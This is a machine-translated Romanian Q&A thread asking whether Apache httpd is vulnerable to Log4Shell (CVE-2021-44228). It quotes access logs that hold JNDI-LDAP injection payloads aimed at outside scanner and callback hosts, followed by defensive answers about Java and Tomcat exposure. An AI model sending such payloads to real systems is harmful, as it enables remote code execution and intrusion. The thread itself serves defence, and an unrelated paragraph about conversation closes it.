Puncte:44

Serverul web Apache folosește log4j (CVE-2021-44228)?

drapel cn

Serverul web apache (apache2) folosește log4j?

Am Apache2 2.4.38 (debian) instalat pe sistemul de operare Raspberry Pi (64 de biți) și am găsit câteva înregistrări ciudate în jurnalul meu cu privire la CVE-2021-44228 din kryptoslogic-cve-2021-44228.com (pot de miere/scaner), dataastatistics.com (offline și rău intenționat?) și a8fvkc.dnslog.cn (nu stiu ce este asta)

Ce ar trebui să fac acum?

  • nimic pentru că apache2 nu este afectat de CVE-2021-44228
  • formatați totul și așteptați câteva zile înainte de a instala o versiune corectivă
  • „verificați” dacă există fișiere .class noi și dacă nu există, continuați operarea (și utilizați patch-uri manuale precum log4j2.formatMsgNoLookups = ADEVĂRAT
  • altceva

Jurnalele:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228 .com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] „GET / HTTP/1.1” 200 5932 „http://79.232.126.49/” „${jndi:ldap://http80useragent. kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] „GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1” 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] „GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1” 8456 „http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D” „Kryptos Logic Telltale”
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] „GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1” 8456 „http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D” „Kryptos Logic Telltale”
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228 .com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] „GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1” 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] „GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] „GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] „GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] „POST /api/v2 HTTP/1.1” 400 5115 „${jndi:ldap://[*****mydomain** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] „POST /api/v2 HTTP/1.1” 400 5115 „${jndi:ldap://[*****mydomain** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] „GET / HTTP/1.1” 301 568 „-” „${jndi:ldap://a8fvkc.dnslog.cn/a}”
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] „GET / HTTP/1.1” 200 6576 „-” „${jndi:ldap://a8fvkc.dnslog.cn/a}”
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] „GET /favicon.ico HTTP/1.1” 200 7103 „-” „${jndi:ldap://a8fvkc.dnslog.cn/ A}"
Tilman Schmidt avatar
drapel bd
Vă rugăm să distribuiți acele înregistrări de jurnal „ciudate” pe care le menționați. Este greu să le evaluezi fără să le vezi.
user3067860 avatar
drapel ng
Rețineți că doar pentru că _unul_ software nu este afectat nu înseamnă că nu rulați alt software care ar putea fi afectat.
Puncte:82
drapel mx

The Server HTTP Apache nu este scris în Java, nu folosește biblioteca log4j, deci nu este afectat de CVE-2021-44228.

Fișierele dvs. jurnal sunt din jurnalul de acces, acestea arată oamenii care scanează pentru vulnerabilitatea log4j.

mckenzm avatar
drapel in
Mă bucur să văd Tomcat acoperit într-un alt răspuns.
drapel mx
Nu are legătură directă, dar dacă găsiți acest QA pentru a verifica configurația Apache HTTP Server, asigurați-vă că faceți upgrade la versiunea 2.4.52. Versiunile anterioare au propriile [vulnerabilități](https://httpd.apache.org/security/vulnerabilities_24.html), cum ar fi [CVE-2021-44224](https://cve.mitre.org/cgi-bin/cvename .cgi?name=CVE-2021-44224).
Puncte:8
drapel ng

Apache în sine nu este scris în Java și nu face legătura directă cu infama bibliotecă Log4j. Este deosebit de ferit de această vulnerabilitate.

Ce altceva poate merge prost, atunci?

  1. Nu totul cu Apache în numele său și funcțiile HTTP este exact cel Server Apache HTTPD.Apache Tomcat, de exemplu, este un server web HTTP complet diferit. Este scris în Java și poate fi configurat să folosească Log4J. Nu sunt cu adevărat sigur dacă este deloc posibil să vă logați altfel în Tomcat.

Cineva cu mai puțină experiență și cunoștințe este perfect capabil să-i înșele pe cei doi. Și, din câte știu, Tomcat are, în general, un istoric de securitate mai bun decât HTTPD-ul Apache „clasic”.

(După comentariul lui Bob, facilitate implicită de înregistrare în Tomcat nu este Log4J.)

  1. Apache HTTPD este foarte extensibil. Poate fi configurat pentru a apela alte lucruri în fundal prin varietatea de interfețe (de exemplu, pentru a prelua pagini web dinamice care sunt generate programatic). Unele dintre aceste „lucruri din fundal” pot fi bazate pe java și legate la biblioteca Log4J.

Kilometrajul dvs. poate varia, mai ales dacă nu vă cunoașteți în detaliu stiva dvs. de software.


Pentru a fi sigur, ar trebui să verificați mai întâi dacă aveți instalată vreo mașină Java. În managerul dvs. de pachete, pachetele sale vor fi numite JRE-ceva, JVM-ceva sau poate JAVA-ceva.

Puteți încerca la fel de bine:

versiunea java

în carapacea ta.

Dacă nu aveți niciunul dintre acestea și nu ați instalat JAVA în afara managerului de pachete, sunteți în siguranță.

Nu este sigur în general, dar cel puțin împotriva CVE-2021-44228.

drapel kz
Bob
*> Nu sunt sigur dacă este deloc posibil să vă logați altfel în Tomcat.* Tomcat, implicit, nu folosește log4j decât dacă este configurat altfel. [În mod implicit, folosește `java.util.logging` printr-un furk al Apache Commons Logging.](https://tomcat.apache.org/tomcat-9.0-doc/logging.html) În 8.0 [instrucțiuni](https: //tomcat.apache.org/tomcat-8.0-doc/logging.html#Using_Log4j) au fost furnizate pentru trecerea la log4j, dar acestea au fost [eliminate](https://tomcat.apache.org/tomcat-8.5-doc/logging .html) în 8.5.
drapel kz
Bob
*> Dacă nu aveți niciunul dintre acestea și nu ați instalat JAVA în afara managerului de pachete, sunteți în siguranță.* Natura JRE și modul în care este redistribuit înseamnă că multe aplicații îl pot și îl vor încorpora mai degrabă decât să îl folosească un manager de pachete OS (dacă există unul... vezi Windows și macOS). Cu siguranță **nu** este sigur să presupunem că nu aveți niciun program vulnerabil, pur și simplu pentru că nu ați instalat dvs. Java, managerul de pachete sau altfel. De obicei, acele versiuni încorporate nu fac parte nici din `PATH`, așa că testarea `java` în shell nu este o garanție de siguranță.
fraxinus avatar
drapel ng
Q întreabă în mod explicit despre Rapsbian. În Linux, aplicațiile (în special cele de server) în general nu își aduc JVM-ul, ci doar îl listează ca dependență, iar managerul de pachete aduce tot ce este necesar.
drapel ec
@fraxinus, deși există o mulțime de oameni care încearcă să strice asta cu lucruri precum Snaps.
drapel il
@fraxinus nu poți face acea generalizare. Produsele elastice au propriul lor JRE, de exemplu. Cu Java modern, nici măcar nu există un JRE autonom - dezvoltatorii ar trebui să-și alcătuiască propriul pentru nevoile aplicației lor.
drapel kz
Bob
@fraxinus Problema când vorbim despre securitate este că „în general” nu este suficient de bun. Există suficiente produse, în special produse pentru întreprinderi mari (inclusiv pe Linux), care își vor grupa propriul JRE, încât este o preocupare legitimă. Mai ales cu o vulnerabilitate atât de gravă. De asemenea, în timp ce acest organism al întrebării se poate referi la Raspbian în mod specific, titlul întrebării îi poate determina pe alții să se uite la întrebare - iar IMO atunci când oferă sfaturi de securitate este într-adevăr cel mai bine să acopere toate bazele.
fraxinus avatar
drapel ng
Pur și simplu NU POȚI acoperi toate bazele în răspunsul de securitate la o întrebare simplă. Cunoașterea stivei dvs. de software este esențială și, dacă nu, meriți ceea ce obțineți. Fără aceasta, apelezi la rețete cu „în general” în ele.
mckenzm avatar
drapel in
@fraxinus cu siguranță o fac. Carcasele Primo includ Minecraft și Arduino. Își aduc pe ale lor. Nu numai că, dar o mulțime de pârghii ale containerului se învârte în jurul versiunii prealabile 8 și chiar a versiunii prealabile 6. Containerele trebuie să pună la închisoare acel %&^!.

Postează un răspuns

Majoritatea oamenilor nu înțeleg că a pune multe întrebări deblochează învățarea și îmbunătățește legătura interpersonală. În studiile lui Alison, de exemplu, deși oamenii își puteau aminti cu exactitate câte întrebări au fost puse în conversațiile lor, ei nu au intuit legătura dintre întrebări și apreciere. În patru studii, în care participanții au fost implicați în conversații ei înșiși sau au citit transcrieri ale conversațiilor altora, oamenii au avut tendința să nu realizeze că întrebarea ar influența – sau ar fi influențat – nivelul de prietenie dintre conversatori.